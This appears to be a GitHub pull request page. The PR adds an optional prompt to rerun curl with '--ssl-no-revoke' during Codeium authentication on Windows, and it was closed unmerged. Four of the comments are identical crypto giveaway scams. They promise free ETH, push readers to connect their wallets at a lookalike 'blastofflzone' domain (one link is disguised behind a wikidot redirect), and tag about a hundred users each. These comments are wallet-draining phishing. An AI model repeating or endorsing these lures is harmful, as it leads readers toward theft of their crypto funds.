### PR TITLE
Addresses #148 - Improves behavior of Codeium Auth

### PR DESCRIPTION
**Pull request by psalm842**
Codeium Auth will now prompt the user to ask if they want to run curl with the "--ssl-no-revoke" option if a revocation error is detected during authorization and they are using a windows system.

### CODE REVIEW

**Comment by psalm842** [comment]
# Testing Method and Results

Deleted the config.json file (which contained the stored api key to force a re-auth) and retried authentication on my system. It produced the expected prompt upon the curl ssl error and then successfully authenticated after responding to the prompt with a "y"

**Comment by aerosonic-jp** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
rajivbaranwal, @jeremytsngtsng, @xianz271828, @theo-lev, @tenebrisAenigma, @bstizz14, @Calvin087, @rubenoliveros, @LinkiT8300, @BasilStocking, @v-van, @vs4vijay, @Thxzzzzz, @just4n00b-a, @Orendev, @mikechesterwang, @thesimplezero, @addyxvii, @PinkR1ver, @evelynEdison, @omondi8399, @izayl, @viorel-d, @iabcxyz, @muhammadaasim, @ousawack, @raviqqe, @0xgxthxb, @RuneRobot, @saed13, @princeleonal, @SilasZhr, @Alakazam03, @open3x, @dmitrymotorin, @armeldevsarl, @Benllycast, @thestockman27, @deelaks, @adrianblade, @userxwhoami, @satyamsingh07, @jc628, @nikolahu, @jordanlepera, @tuoxiansp, @AdminBlock, @Cryking, @pakhuong, @Chinjoypillowsoft, @Aphiwit1, @0xccx, @bartomolina, @SandeepGumaste, @traviswpeters, @0x518, @raghu535, @LucasOliveiraS, @niksche, @taylorliu, @thedv91, @MineWang, @intrger, @vkxal, @sakshamio, @waterhumanB, @phucledien, @smart99999, @philipglazman, @Oceeapril, @maccage, @billwang1990, @ngayers4, @modernell, @talhaturan, @asimd, @lingchingteng, @NaviNavu, @pdrolima, @lorenzopalaia, @lenville, @anipaul2, @qdriven, @100nandoo, @ana585, @pawelmiklas, @ElTitoDG, @SauravTyagi1987, @nitin7dc, @lukebrichey, @klkuogamer, @selinarslanbulut, @0xNazgul, @aischle, @vishnu1priyan, @MarcoPereira27, @belajarqywok, @themrinalsinha, @otayiz

**Comment by jguzej** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
moocstudent, @waymaiker, @Luke-Rogerson, @Bholland1981, @vmedvedev, @LexaHood, @KrisPett, @danil007524, @maikhai889, @Aktherhossen475, @joengelh, @roigecode, @Dom-Mac, @qinyuguang, @4r7if3x, @hjki456789, @syntix, @Svetlana-art, @hungdiep97, @AllenChanAnc, @JhiNResH, @aryaminus, @StephanieIlievaa, @Eidjaz, @watchanan491, @JiangYongKang, @otampy3184, @bryan99nayrb, @tongshi, @anburera, @MaharshiChoksi, @qweekdotstechnologies, @McXD, @matyo91, @Frederik-11, @whwbang, @arihantbansal, @0xyicheng, @coding-dynasty, @kumar-ish, @marzkud, @TimberTang, @mowmanminer, @LQ-11, @devolaw, @penso, @cfelde, @Running-Chen911, @lcbasu, @Squirre17Josbit1, @jyturley, @ntchjb, @nguyenanh29, @terox, @jaiminpan, @StanleyAu, @djinncrypto, @Opegif, @ryanberckmans, @tallongsun, @ayuLiao, @woahdy, @hanoiancs, @DNAngeluS, @rdrex, @fuinha, @metraje, @Yakumwamba, @shahfaisallive, @t-maker564, @jeffczpf, @Drownedgod85, @climbingryan, @hashtafak, @georgiIvanov, @StefanSan26, @hosseind88, @piyoppi, @zongzheng123, @icarumbas, @mapping77, @skonaads, @z-shen, @Kevin-Zh-CS, @EasonWW, @tomaszfelczyk, @andrewpedia, @timkmit, @talon-so, @raabbit12, @raphaelpc, @SimSimButDifferent, @CM270, @imbarwinata, @ismailmoazami, @sergey-melnychuk, @Shpota, @tristanpenman, @Peefy

**Comment by chugo-admin** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
mattupham, @sobitd, @mikeoertli, @dongxuteng, @sephynox, @Miguelneil, @nistadev, @senmonster, @rpranayr, @Sean12697, @galaxyxym, @0xSyam, @kulakovd, @jrbrowning, @NPetz, @liuser, @IvanovRoman, @daebowale, @BARK-MBISHOP, @A6B0, @ChrisFrontDev, @eeevvaaa, @joeymach, @srivatsav01, @Pljas, @Julia-fil1, @angelr1076, @ardyfeb, @j67dee, @LordEvendim, @oniox, @0xYujan, @rajeebkm, @balrampandey19, @BrandyFortunata, @sphilee, @ChengYingWu, @abstrakt, @SofianeBoumedine, @adrien-bru, @pauljxtan, @deepakgudla, @subinium, @Zeekey0427, @kwikiel, @andr-drozd, @bmskutt, @peitalin, @abdullah1908, @refl3ctionrajendransp133, @EasonWW, @cypherkunp, @smfxfc, @schroyar, @cOnjuer, @jmRakoto, @noyyyy, @babalakk, @yoshikouki, @Madhavaraj-s, @yessGlory17, @ivermac, @Reedam-Ranjan, @joseabraham, @yashwantx, @g-tejas, @Zozak77, @xhliu, @masami87, @Ndamix-Store, @ozmel1, @bzuker, @coolryanc, @Yuvrajsinggh, @mymtsai, @kuzminetskiy, @gpBlockchain, @MeshaelR, @Kyuuari, @AmadiMichael, @stonedaf, @jasonjiaox, @lixiaoyu77, @CMD-reverse, @phyBrackets, @gurdeep999, @msakirarslan, @rkreutz, @n1c01a5, @ahmadaimandev, @GalvinGao, @FriendlyLifeguard, @SuperB-oris, @adi44, @EastPanda, @ahmet633, @hmbool, @pdqt284, @gandazhi

**Comment by 07Owuor** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
alvaro-jmp, @daruiwu, @mark2021blue, @supercocoa, @longht021189, @zhwei820, @biezhihua, @sam-s-app, @andrii-drobiazko, @Raeraeallday1, @swift1337, @CoCo-Mr, @omidsfd, @opticalor, @irakliy01, @dennismarye, @bontequero, @kazekim, @dp021294sav, @tutiputi, @0x48415a484952, @Arioobarzann, @msrdanov, @optout21, @mac-code, @LinminCrypto, @AAIS2, @brianmwadime, @TheOn-code, @KY-zero, @Kerita, @ygsgdbd, @mrkaurelius, @VatsalNarwal, @darklost, @Emanxu, @ppd0705, @TOPCODER10192, @hoveyfafa, @kramlex, @chenzhuo112, @dijonkitchen, @Dashon-Hawkins, @Starterforward, @DavidMtundi, @modulexcite, @GizNouv, @kittiwatm, @srinitude, @rise-worldsg153xx, @davidp94, @0xthreebody, @Marya48800, @Fabbboy, @JulianLiu, @ngn999, @LB6264, @El-Moatasem-Turing, @Bbjj88h, @Wryhder, @cardinalsystem256, @Kabie, @DiscoveryFox, @the-decentralizer, @wakiyamap, @legua25, @charlesbash, @REALSDEALS, @007mriganka, @Demas2117, @poya-r, @AleksandrKovzhut, @ivandrofly, @zzau13, @Nakin012519Dathong, @cocest, @RSivakov, @ouyun, @huajun-cplus, @ntop001, @phoxiao, @Learn2Bee, @mr-seifi, @miloserdow, @dappstore123, @ccxdd, @ldoublewood, @luotianming123, @SnailMyth, @peaceandwhisky, @jemshit, @eteryko, @jameschern, @ly82505129, @Miss-Lonelyhearts, @Nadasayed129, @omeryildiz, @Alestrio, @tasti

**Pull request closed without merging**
